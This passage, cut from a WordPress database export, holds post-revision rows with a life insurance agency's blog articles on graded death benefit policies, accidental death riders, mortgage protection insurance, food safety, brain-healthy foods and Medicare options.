assisted living facility:<sup>3</sup>\r\n<ol>\r\n 	<li>Emotional burnout</li>\r\n 	<li>Physical burnout</li>\r\n 	<li>Role confusion</li>\r\n</ol>\r\nThe transition to getting in-home care or moving to assisted living is a sensitive and personal decision.\r\n\r\nRecognizing some signs of decline in seniors and caregivers may help ease the transition. Communication and coordination between caregivers and seniors are key throughout the aging process.<sup>2</sup>\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 8pt;\">Sources:\r\n</span><em style=\"font-size: 8pt;\">1. WAHCA, 5 Signs That It Might Be Time to Consider Home Care, 2019, <a href=\"https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/\" target=\"_blank\" rel=\"noopener noreferrer\">https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/</a>\r\n</em><em style=\"font-size: 8pt;\">2. Johns Hopkins Medicine, Caregiving: Knowing When It’s Time for In-Home Help, 2021, <a href=\"https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help</a>\r\n</em><em style=\"font-size: 8pt;\">3. Assistedliving.org, 5 Signs It’s Time to Hire a Home Health Aide, n.d. 2021, <a href=\"https://www.assistedliving.org/hire-a-home-health-aide/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.assistedliving.org/hire-a-home-health-aide/</a></em>','Key Signs It’s Time To Get In-Home Care Or Move To An Assisted Living Facility','','inherit','closed','closed','','54-revision-v1','','','2023-03-19 17:37:18','2023-03-19 17:37:18','',54,'http://cmdev-site1.com/?p=390',0,'revision','',0),(391,3,'2023-03-19 17:37:55','2023-03-19 17:37:55','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\r\n<div></div>\r\n<div class=\"article_info\">This situation may be familiar to you: You’ve made the decision to help protect your family and are considering purchasing life insurance as a means to do so. However, as you start looking into life insurance options, you begin to feel overwhelmed by the amount of choices available to you and may even be confused if you qualify for life insurance.</div>\r\n<div></div>\r\n<div class=\"article_info\">In this article, we’ll discuss one specific type of whole life insurance: graded death benefit whole life insurance. Read on to learn more about what a graded death benefit whole life insurance policy is, how it works, and considerations to make before purchasing it.</div>\r\n&nbsp;\r\n\r\nGraded death benefit whole life policies are a type of whole life insurance. Life insurance policies are offered in two major types: term life and whole life policies.\r\n\r\n<a href=\"https://www.globelifeinsurance.com/article/how-long-term-life-policy\" target=\"_blank\" rel=\"noopener noreferrer\">Term life insurance</a> is a type of life insurance policy that pays a stated death benefit in the event the person insured dies during the specified term of coverage.\r\n\r\n<a href=\"https://www.globelifeinsurance.com/article/what-is-whole-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">Traditional whole life insurance</a>, meanwhile, provides permanent death benefit coverage for the life of the insured. Whole life insurance may also carry a cash value component, which allows the policyholder to build <a href=\"https://home.globelifeinsurance.com/articles/august-2020/can-whole-life-insurance-be-used-to-save-for-c-(1)\" target=\"_blank\" rel=\"noopener noreferrer\">cash value</a> after a certain amount of time via the payment of premiums.\r\n\r\nWhat are the requirements for purchasing life insurance? Is a medical exam or health application required?\r\n\r\nLife insurance providers may require you to provide evidence of insurability prior to issuing you coverage. Evidence of insurability may involve you undergoing a medical exam or answering a health questionnaire.\r\n\r\nThis is not a comprehensive list of requirements that may be involved in purchasing life insurance.\r\n<h3>What is a graded death benefit whole life insurance policy?</h3>\r\nA graded death benefit whole life insurance policy is a type of whole life insurance. It may provide people not approved for standard life insurance an option to purchase life insurance.\r\n\r\nWhy? A medical exam is usually not required for a graded death benefit whole life insurance policy. As such, it may be an attractive option for people who have been declined for coverage due to personal health or other reasons like heart conditions, cancer, or even stroke.\r\n<h3>How does a graded death benefit whole life insurance policy work?</h3>\r\nA graded death benefit whole life insurance policy often works like a normal whole life insurance policy, except it usually has a waiting period, typically two to three years, before it will pay the full amount of death benefits. In the event your death occurs during the waiting period, a graded death benefit whole life insurance policy may pay a lower amount to your beneficiaries.\r\n\r\nWhat might you consider before purchasing a graded death benefit whole life insurance policy?\r\n\r\nYou may want to consider the following before purchasing a graded death benefit whole life insurance policy:\r\n<ol>\r\n 	<li><strong>Consider your health.</strong>\r\nA graded death benefit whole life insurance policy may offer those with significant risk factors a way to get life insurance. It may also be an appropriate option for you if you consider undergoing a health exam or a more exhaustive health screening a hassle.</li>\r\n 	<li><strong>Consider whether or not you want a type of whole life insurance policy.</strong>\r\nA graded death benefit policy is a type of whole life insurance. It provides coverage for the life of the insured, unlike term life insurance policies that expire after a certain time period.</li>\r\n 	<li><strong>Consider the waiting period and associated premiums.</strong>\r\nPremiums usually do not increase year-to-year for a graded death benefit whole life insurance policy. After the waiting period, the policy’s benefits will increase to the face value—the full insurance coverage amount—of the policy.</li>\r\n</ol>\r\nThis is not a comprehensive list of factors you may want to consider before purchasing a graded death benefit whole life insurance policy.\r\n<h3>A graded death benefit whole life insurance policy may be a helpful insurance coverage option for you.</h3>\r\nA graded death whole life insurance policy may be a helpful insurance coverage option for you. It may be able to help provide you with financial protection if you would not otherwise qualify for life insurance due to a pre-existing or chronic health condition or illness.\r\n\r\nA graded death benefit whole life insurance policy may require a waiting period to pass before paying out on the policy.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','How Does A Graded Death Benefit Whole Life Insurance Policy Work?','','inherit','closed','closed','','57-revision-v1','','','2023-03-19 17:37:55','2023-03-19 17:37:55','',57,'http://cmdev-site1.com/?p=391',0,'revision','',0),(392,3,'2023-03-19 17:38:34','2023-03-19 17:38:34','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\nWhen many of us think of our passing, we imagine it will be something that doesn’t happen until well into our old age. But what happens if the unthinkable happens and your life is taken in an accident?\r\n\r\nAccording to the CDC, each year, there are more than 170,000 deaths attributed to unintentional injuries, including motor vehicle accidents.<sup>1</sup>\r\n<h3>Simply put: Accidents happen.</h3>\r\nSo, are you and your loved ones prepared in the event of a fatal accident? In this article, we’ll explore some ways you can shore up your life insurance protection to help benefit your loved ones in the event of your untimely (and accidental) passing.\r\n<h3>What is accidental death insurance?</h3>\r\nAccidental death insurance is often a clause or rider connected to a life insurance policy. It provides additional benefits to beneficiaries in the event the insured passes away under the coverage period from a covered accident. The insured often pays an additional premium if this rider is added to their existing policy.\r\n<h3>What is considered an “accidental death”?</h3>\r\nAccidental deaths, in the eyes of many insurance companies, are those that occur as the result of an incident that’s caused by forces outside of your control.\r\n\r\nThink of car crashes, slips and falls, choking, drowning, machine accidents, and other situations that cannot be controlled and are deemed by the insurance company to be an accident.\r\n\r\nIncidences of an accidental death that stem from a hazardous activity, such as race car driving, base jumping, or sky diving, often aren’t covered under accidental death coverage. This is subject to the insurance company’s specific policy terms. Death from an illness is excluded. Deaths stemming from illegal activities can be excluded as well.\r\n<h3>Why might you want to consider accidental death coverage?</h3>\r\nAdding additional coverage to an existing life insurance policy can be a helpful benefit for your loved ones and beneficiaries. They can be even better protected in the event of your sudden, unforeseen passing.\r\n\r\nThe addition of accidental death coverage to your existing life insurance policy can provide extra help for your family in their time of need if they were to lose you to an accident.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em>Sources:</em>\r\n</span><em><span style=\"font-size: 8pt;\">1. <a href=\"https://www.cdc.gov/nchs/fastats/accidental-injury.htm\" target=\"_blank\" rel=\"noopener noreferrer\">CDC, Accidents or Unintentional Injuries</a>, 2021</span></em>','Do I need Accidental Death Insurance?','','inherit','closed','closed','','61-revision-v1','','','2023-03-19 17:38:34','2023-03-19 17:38:34','',61,'http://cmdev-site1.com/?p=392',0,'revision','',0),(393,3,'2023-03-19 17:39:28','2023-03-19 17:39:28','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\n<div></div>\r\n<div class=\"article_info\">Eating healthy is not only good for your health and well-being, but it can also be extremely beneficial to your brain as well. According to experts, foods high in antioxidants and omega-3 fatty acids can improve brain health and memory.</div>\r\nThe following are six foods that can enhance brain function and protect it against diseases like dementia and Alzheimer’s...\r\n<p style=\"padding-left: 40px;\"><strong>1. Walnuts – </strong>A 2009 study in the Journal of Nutrition revealed that a diet rich in nuts can actually reverse the signs of aging in the brain, including the ability to function and process information.</p>\r\n<p style=\"padding-left: 40px;\">In addition, a study performed in 2010 at the International Conference on Alzheimer’s disease showed that walnuts can improve learning, memory, and motor coordination.</p>\r\n<p style=\"padding-left: 40px;\">Walnuts are also known to be high in antioxidants, which some researchers believe may combat the damage done to the brain cells’ DNA.</p>\r\n<p style=\"padding-left: 40px;\"><strong>2. Carrots – </strong>Not only have carrots been proven to be good for eyesight, but studies now show that they are great for the brain too. According to a 2007 article in the Archives of Internal Medicine, diets rich in beta-carotene over an extended period of time showed significant improvement in verbal memory and general cognition.</p>\r\n<p style=\"padding-left: 40px;\">In fact, scientists believe that beta-carotene can help eliminate the stress that contributes to brain aging.</p>\r\n<p style=\"padding-left: 40px;\">A study published in the 2010 Journal of Nutrition also revealed that carrots are high in luteolin. Luteolin is a compound that has been found to reduce age-related memory problems, as well as inflammation in the brain. Olive oil, peppers, and celery are also rich in luteolin.</p>\r\n<p style=\"padding-left: 40px;\"><strong>3. Berries – </strong>Berries can provide a variety of health benefits, including memory improvement. The 2010 Journal of Agricultural and Food Chemistry noted that adults who suffered slight memory problems began to show memory and recall improvement after just twelve weeks of drinking wild blueberry juice. The study further showed that blueberries also helped with signs of depression in seniors.</p>\r\n<p style=\"padding-left: 40px;\">A 2009 study performed and recorded in the Journal of Nutrition showed that fruits high in antioxidants, such as blueberries and strawberries, can decrease stress in cells that are related to aging and increase certain brain functions.</p>\r\n<p style=\"padding-left: 40px;\"><strong>4. Fish – </strong>According to recent studies, fish oil rich in omega-3 fatty acids may slow the cognitive decline that comes with age. A study in the journal Archives of Neurology found that people 65 and older who ate two meals a week for six years that included fish showed to have a 13 percent decrease in cognitive decline.</p>\r\n<p style=\"padding-left: 40px;\">Even those who only ate one meal with fish every week for six years demonstrated a ten percent decrease in cognitive decline. Fish is also a great resource for vitamin B12, which has been shown to help protect against Alzheimer’s disease.</p>\r\n<p style=\"padding-left: 40px;\"><strong>5. Coffee/Tea – </strong>Coffee and tea have been shown to be beneficial in preventing Alzheimer’s disease and improving cognitive function. A study in the 2010 Journal of Alzheimer’s Disease noted that caffeinated coffee has been found to slow the progression of the disease or help prevent it from developing.</p>\r\n<p style=\"padding-left: 40px;\">Based on this finding, experts believe that coffee and tea may eventually be used as therapeutic treatment for people with Alzheimer’s disease. Research has also shown that tea can work as a protective agent for the brain.</p>\r\n<p style=\"padding-left: 40px;\">According to an article in the 2010 Journal of Nutrition, studies show that tea drinkers actually do better on memory tests and information processing than non-tea drinkers.</p>\r\n<p style=\"padding-left: 40px;\"><strong>6. Spinach – </strong>Many health benefits come from spinach, including its ability to help to improve cognitive function. Scientists believe this is because it contains high amounts of vitamins C and E.</p>\r\n<p style=\"padding-left: 40px;\">According to a study published in the Journals of Gerontology in 2000, a diet rich in vitamin E increased brain and nerve tissue, as well as increased dopamine release into the brain, the chemical that allows information to be processed.</p>\r\n<p style=\"padding-left: 40px;\">Lastly, a study performed in 2000 and published in the journal Brain Research found that consuming spinach, strawberries, and blueberries can reverse age-related memory and motor deficits.</p>\r\nIn conclusion, these six brain foods may help improve brain health and perhaps even slow memory decline that can come with age.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','6 Foods That Feed Your Brain','','inherit','closed','closed','','65-revision-v1','','','2023-03-19 17:39:28','2023-03-19 17:39:28','',65,'http://cmdev-site1.com/?p=393',0,'revision','',0),(394,3,'2023-03-19 17:40:35','2023-03-19 17:40:35','<div class=\"article_info\"><span style=\"font-size: 10pt;\">By Lucille Reed</span></div>\r\n<div></div>\r\n<div class=\"article_info\">As the weather warms up and families eat more of their meals outdoors, it’s easy for a potentially hazardous scenario to become a reality: food contamination. According to the CDC, foodborne illness is a common public health issue.</div>\r\n<div></div>\r\n<div class=\"article_info\">Estimates are that one in six Americans get sick from contaminated foods or beverages each year. Three thousand Americans die from such illnesses every year.<sup>1</sup></div>\r\n<div></div>\r\n<div class=\"article_info\">So what is food contamination, why is it potentially hazardous, and what are the ways people can practice safe food handling and preparation?</div>\r\n&nbsp;\r\n<h3>What are food contamination and food poisoning?</h3>\r\nFood contamination occurs when food is tainted with bacteria, mold, or other toxins at some point along the food production chain.<sup>2</sup> This can result in food poisoning when the food is ingested. Generally, the symptoms of food poisoning are similar to the stomach flu: nausea, vomiting, and other highly uncomfortable GI issues.<sup>3</sup>\r\n\r\nSometimes contaminated food can be easily identified, such as visibly moldy bread or smelly, rotten eggs. Other times, the bacteria, mold, or other contaminants cannot be seen by the naked eye.\r\n<h3>When food poisoning gets serious</h3>\r\nNo one likes to be sick. While many cases of food poisoning get better with time, there is a real risk of potential complications—especially dehydration and other serious health complications. Depending upon the contaminant, medical intervention may be necessary to help alleviate the symptoms or complications of food poisoning.<sup>3</sup> Contact your healthcare provider if you feel you need to be seen.\r\n<h3>Preventing foodborne illness</h3>\r\nPrevention is critical when it comes to food poisoning. Make sure you practice safe food preparation, storage, and serving protocols each time you prepare food for others—and for yourself. Keep foods at appropriate temperatures, and don’t let food sit out for extended periods of time.<sup>4</sup>\r\n\r\nExamine your food before ingesting it, especially canned and fresh fruit and veggies, to make sure the packaging is intact. Never eat food in which the packaging is cracked, has loose lids, or looks swollen. Practice good handwashing and hygiene when preparing foods, especially raw meats. Do not prepare foods if you are sick, especially with stomach-related illnesses.<sup>4</sup>\r\n\r\nFood contamination is a serious issue that impacts many Americans each year. Ensure you follow proper food handling practices to keep everyone at your outdoor meal safe.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em><span style=\"font-size: 8pt;\">Sources:</span></em>\r\n</span><em><span style=\"font-size: 8pt;\">1. CDC, CDC’s Role in Food Safety, 2020, <a href=\"https://www.cdc.gov/foodsafety/cdc-and-food-safety.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.cdc.gov/foodsafety/cdc-and-food-safety.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. CDC, How Food Gets Contaminated, 2017, <a href=\"https://www.cdc.gov/foodsafety/production-chain.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.cdc.gov/foodsafety/production-chain.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. NIDDK, Treatment for Food Poisoning, 2019, <a href=\"https://www.niddk.nih.gov/health-information/digestive-diseases/food-poisoning/treatment\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.niddk.nih.gov/health-information/digestive-diseases/food-poisoning/treatment</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">4. CDC, Foods That Can Cause Food Poisoning, 2020, <a href=\"https://www.cdc.gov/foodsafety/foods-linked-illness.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.cdc.gov/foodsafety/foods-linked-illness.html</a></span></em>','Food Contamination: Ways To Avoid The Potential Dangers And Keep Food Safe','','inherit','closed','closed','','68-revision-v1','','','2023-03-19 17:40:35','2023-03-19 17:40:35','',68,'http://cmdev-site1.com/?p=394',0,'revision','',0),(395,3,'2023-03-19 17:41:35','2023-03-19 17:41:35','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Mike Elman</span></div>\r\n<div></div>\r\n<div class=\"article_info\">When you purchase a home, you’ll most likely have a mortgage along with it. Mortgages usually last about 30 years (though there are shorter options), which leaves you responsible for a monthly payment for a long period of time.<sup>1</sup></div>\r\n&nbsp;\r\n<h3>Life Insurance When You Have a Mortgage</h3>\r\nWhen making preparations for the future, people often purchase life insurance to help protect their loved ones in the event of their passing. When someone has a mortgage, a specific type of insurance they may consider is Mortgage Protection Insurance. This type of insurance is purchased to pay off the balance of a mortgage in case the insured dies, primarily so their family can stay in the home.\r\n<h3>How Mortgage Protection Insurance Works</h3>\r\nUnlike traditional life insurance, which has a constant benefit amount, Mortgage Protection Insurance has a benefit that usually decreases as the mortgage balance goes down over time. The premium amount typically remains constant.<sup>2</sup>\r\n\r\nInstead of the benefit going to a traditional beneficiary (like a spouse or other loved one), the benefit usually goes to the mortgage lender specifically to pay off the remainder of the mortgage.\r\n<h3>MPI vs. PMI</h3>\r\nMortgage Protection Insurance (MPI) is a voluntary insurance that the insured may choose to purchase to pay the lender in case they die before the mortgage is paid off. MPI should not be confused with Private Mortgage Insurance (PMI), which is not voluntary.\r\n\r\nWhen you take out a conventional mortgage loan without putting down 20 percent, some lenders might require you to get PMI. This pays the lender if you stop making payments and is not designed to protect you.<sup>2</sup>\r\n<h3>Key Takeaway</h3>\r\nMortgage Protection Insurance usually has a decreasing benefit amount that decreases as the mortgage balance goes down. The benefit goes to the mortgage lender.\r\n\r\nIf you want to know if Mortgage Protection Insurance is right for you, contact a financial advisor. If you want to know more about Mortgage Protection Insurance, contact a licensed insurance agent.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em><span style=\"font-size: 8pt;\">Sources:</span></em>\r\n</span><em><span style=\"font-size: 8pt;\">1. <a href=\"https://www.marketplace.org/\" target=\"_blank\" rel=\"noopener noreferrer\">Marketplace</a>, “Why do we have a 30-year mortgage, anyway?” 2018</span></em>\r\n<em><span style=\"font-size: 8pt;\">2. <a href=\"https://www.forbes.com/\" target=\"_blank\" rel=\"noopener noreferrer\">Forbes</a>, “The Keys to Mortgage Life Insurance” 2020</span></em>','What Is Mortgage Protection Insurance?','','inherit','closed','closed','','71-revision-v1','','','2023-03-19 17:41:35','2023-03-19 17:41:35','',71,'http://cmdev-site1.com/?p=395',0,'revision','',0),(396,3,'2023-03-19 17:41:59','2023-03-19 17:41:59','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\n<div></div>\r\n<div class=\"article_info\">Many Americans believe life insurance to be a necessity and include life insurance as part of their regular financial planning. With its ability to fill a variety of needs, like providing supplemental income or helping pay for college, life insurance can help young families provide continued financial security to their loved ones.</div>\r\n<div></div>\r\n<div class=\"article_info\">For this reason, it’s no surprise that many Americans believe that life insurance can be the most important purchase they make. But do young American families really need to consider purchasing life insurance so soon?</div>\r\n&nbsp;\r\n<h3>Why Young Families Should Consider Life Insurance</h3>\r\nLife insurance may be the most important purchase you make in your family. Why? Because it could help contribute to your family’s continued financial stability, security, and lifestyle in the event that something should happen to you or your spouse.\r\n\r\nAsk yourself, what would happen if you or your partner should die unexpectedly? How would bills get paid? Could your family’s financial security and well-being be put in jeopardy? Will your family be able to continue living in their home without your financial support?\r\n\r\nIf asking yourself these questions made you pause with uncertainty, it may be time to consider purchasing life insurance.\r\n<h3>What Young Families Should Know Before Selecting a Life Insurance Policy</h3>\r\nNow that you know you may need a life insurance policy, what type of policy should you consider purchasing? There are a few types of life insurance policies young families can choose from, with the most common options being term and whole life insurance.\r\n\r\nTerm life insurance and whole life insurance differ in that term life insurance only covers the insured for a set amount of time, while whole life insurance can cover the insured for their whole life (or until the policy is canceled).\r\n\r\nUltimately, when deciding on what type of life insurance policy to consider, your decision should be based on what you can afford, what you need, and your personal circumstances. Every young family is different, so there is no one-size-fits-all solution to selecting life insurance.\r\n<h3>Closing</h3>\r\nYoung families can perhaps benefit the most from a life insurance policy, as it can be one of the most important purchases any young family can make. While there is no one-size-fits-all to life insurance, young families should explore their options and consult a financial professional or insurance agent before making a selection.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','Why Young Families Need Life Insurance','','inherit','closed','closed','','74-revision-v1','','','2023-03-19 17:41:59','2023-03-19 17:41:59','',74,'http://cmdev-site1.com/?p=396',0,'revision','',0),(397,3,'2023-03-19 17:42:27','2023-03-19 17:42:27','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Kat Donovan</span></div>\r\n<div class=\"article_info_bottom_line\"></div>\r\nWhile we cannot predict the future, we can always try and plan ahead. Life insurance is a great way to help your family plan for the future, as it can help to alleviate some financial pains on the chance a family member passes sooner than we hope.\r\n\r\nTo gather a better understanding of how life insurance can be used to create a future plan for your family, consider the four ways below.\r\n<h3>Funeral Expenses</h3>\r\nOne perk of buying life insurance is knowing you will be able to cover much, if not all, of the funeral expenses.<sup>1</sup> Considering funerals can be expensive, it can be smart to have this in your back pocket in case a family member dies. It helps you to plan because your day to day income and your savings shouldn’t be needed to cover these unexpected expenses.\r\n<h3>Mortgages</h3>\r\nHaving a family, you may have taken the jump to invest in a house. Unfortunately, if you die before it is paid off, that debt goes to your loved ones.<sup>2</sup> Your loved ones, unless they are particularly wealthy, may struggle to make payments to finish this line of debt.\r\n\r\nBy buying life insurance, you are planning for your family’s future to make sure any debt you may have left to them is minimal.\r\n<h3>Education</h3>\r\nMost people view college as a stepping stone and a necessity to getting good jobs. However, college can get very expensive. While there are different plans families use to save for college, you can also use life insurance.<sup>3</sup>\r\n\r\nA whole life plan has an added cash value where you may save your money tax-deferred a majority of the time.\r\n\r\nGenerally, you are able to borrow against this savings account associated with your life insurance policy to pay for college.<sup>3</sup> Life insurance can help your family plan for the future by ensuring their secondary education will be more affordable.\r\n<h3>Income</h3>\r\nDepending on your situation, you may be the breadwinner in your household. If you were to die, others would be lost without your income. Life insurance helps to make sure there is a source of funding for those dependent upon you after you pass.<sup>4</sup> You are helping to plan for your family’s future by attempting to ensure their financial stability regardless of whether you are alive.\r\n\r\nThere are so many wild cards in life. It’s hard to know where you will be in a week, let alone next year. To help you and your family plan for the future, look to a licensed life insurance agent in your area. They will be able to give you more information and knowledge on the best policy for your situation.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em><span style=\"font-size: 8pt;\">Sources:</span></em>\r\n</span><span style=\"font-size: 8pt;\">1. SmartAsset, Final Expense Insurance, 2018, <a href=\"https://smartasset.com/life-insurance/final-expense-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://smartasset.com/life-insurance/final-expense-insurance</a></span>\r\n<span style=\"font-size: 8pt;\">2. SmartAsset, Mortgage Protection Life Insurance, 2019, <a href=\"https://smartasset.com/life-insurance/mortgage-protection-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://smartasset.com/life-insurance/mortgage-protection-life-insurance</a></span>\r\n<span style=\"font-size: 8pt;\">3. Investopedia, Life Insurance VS 529, 2020, <a href=\"https://www.investopedia.com/articles/personal-finance/102915/life-insurance-vs-529.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/102915/life-insurance-vs-529.asp</a></span>\r\n<span style=\"font-size: 8pt;\">4. Investopedia, How Much Life Insurance Should You Carry? 2019, <a href=\"https://www.investopedia.com/articles/pf/06/insureneeds.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/pf/06/insureneeds.asp</a></span>','4 Ways Life Insurance Helps Families Plan For The Future','','inherit','closed','closed','','77-revision-v1','','','2023-03-19 17:42:27','2023-03-19 17:42:27','',77,'http://cmdev-site1.com/?p=397',0,'revision','',0),(398,3,'2023-03-19 17:42:59','2023-03-19 17:42:59','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\r\n<div></div>\r\n<div class=\"article_info\">You purchased a life insurance policy to help protect your beneficiaries in the event of your passing. Whether you secured a policy due to your growing family, the purchase of a home, or some other life change, you recognized your family would need additional financial resources to help them in the event you pass.</div>\r\n&nbsp;\r\n\r\nBut how do you know how much life insurance coverage is enough? When is the right time to assess your life insurance options? In this article, we’ll explore three ways to help you know you should increase your life insurance coverage.\r\n<h3>Sign #1: You Make More Money</h3>\r\nWhen your income increases, so does the financial gap left behind in the event of your passing. Many consumers purchase life insurance as a way to help cover their income up to a certain amount after they pass away. If your income increases—especially if it dramatically increases—it may be time to look at your life insurance policy’s coverage limits and assess whether it’s a good idea to increase your insurance benefits.<sup>1</sup>\r\n<h3>Sign #2: You Grow Your Family</h3>\r\nAccording to the U.S. Department of Agriculture, the approximate cost of raising a child born in 2015 through age 17 for middle-income, married-couple parents is $233,610.<sup>2</sup> That figure doesn’t even include the costs of college tuition.\r\n\r\nWhen you decide to have a child or expand your family, it’s important to consider the costs of taking care of that child in the event of your passing. Evaluate what expenses they may need covered throughout childhood and beyond.\r\n\r\nThink about your financial goals and what savings vehicles you have in place for your family while you’re living. Consider how those financial needs might change once you’re gone. You may conclude you need to increase your life insurance benefits.\r\n<h3>Sign #3: You Acquire More Assets</h3>\r\nIf you make more money, purchase a house, or acquire other valuable assets, it may be time to increase your life insurance coverage limits. This is especially true for any resources you finance long-term.\r\n\r\nIf you have an asset that a spouse or partner cosigns on (such as a house), your partner will likely be left with the responsibility of paying for that home even after you’re gone. If your consistent income is a factor in the ability to comfortably repay the loans, then you might want to take a look at your life insurance coverage.\r\n\r\nLife insurance may cover much of the financial responsibility left behind in the event of your passing. It’s critical to assess your coverage when you acquire big-ticket assets.\r\n<h3>Conclusion</h3>\r\nThese three signs aren’t a comprehensive list. When planning your life insurance coverage, there are a number of factors to consider. Contact your life insurance agent or financial advisor to go through your individual financial situation to help make the best plan for your family.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em><span style=\"font-size: 8pt;\">Sources:</span></em>\r\n</span><em><span style=\"font-size: 8pt;\">1. <a href=\"https://lifehappens.org/\" target=\"_blank\" rel=\"noopener noreferrer\">Life Happens</a>, 5 Signs You Need to Up Your Life Insurance Coverage, 2018</span></em>\r\n<em><span style=\"font-size: 8pt;\">2. <a href=\"https://www.usda.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">USDA</a>, The Cost of Raising a Child, 2020</span></em>','3 Ways To Know It\'s Time To Increase Your Life Insurance Coverage','','inherit','closed','closed','','80-revision-v1','','','2023-03-19 17:42:59','2023-03-19 17:42:59','',80,'http://cmdev-site1.com/?p=398',0,'revision','',0),(400,3,'2023-03-19 17:43:54','2023-03-19 17:43:54','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nMedicare is a federal health insurance program for people age 65 or older, certain people with disabilities, and people with End-Stage Renal Disease. As you near age 65, you’ll want to decide which type of Medicare coverage is best for you to enroll in Original Medicare (which can be paired with Medicare Supplement insurance) or Medicare Advantage.\r\n<h3>Public vs. Private</h3>\r\nOriginal Medicare, the public option, covers Medicare Part A and Part B. Medicare Part A helps cover hospital stays, care in skilled nursing facilities, hospice care, and some home health care.<sup>1</sup> Medicare Part B helps cover certain doctors’ services, preventative services, outpatient care, and medical supplies.<sup>1</sup>\r\n<h3>Original Medicare can be combined with Medicare Supplement Insurance</h3>\r\nMedicare Supplement insurance is meant to complement existing Original Medicare coverage to help with out of pocket expenses not covered.\r\n\r\nMedicare Supplement insurance can only be purchased when you have Original Medicare.\r\n<h3>Medicare Advantage</h3>\r\nMedicare Advantage Plans cover Medicare Part A, Part B, and usually Part D. They are offered by private companies approved by Medicare.\r\n\r\nMedicare Advantage cannot be combined with Medicare Supplement insurance.\r\n<h3>Original Medicare vs. Medicare Advantage</h3>\r\nBoth Original Medicare and Medicare Advantage allow you to use Medicare benefits, just in different ways.\r\n\r\nThis may seem like a lot to take in, so we’ve listed three factors you may want to consider when choosing the best Medicare coverage for you:\r\n<ol>\r\n 	<li>Hassle</li>\r\n 	<li>Coverage</li>\r\n 	<li>Choice</li>\r\n</ol>\r\n<h3>1. Hassle</h3>\r\n<strong>Original Medicare</strong>\r\nOriginal Medicare and Medicare, Supplement insurance policies, can’t drop your coverage. Both are guaranteed renewable, which means that as long as the premiums are paid on time, you will continue to be covered.\r\n\r\n<strong>Medicare 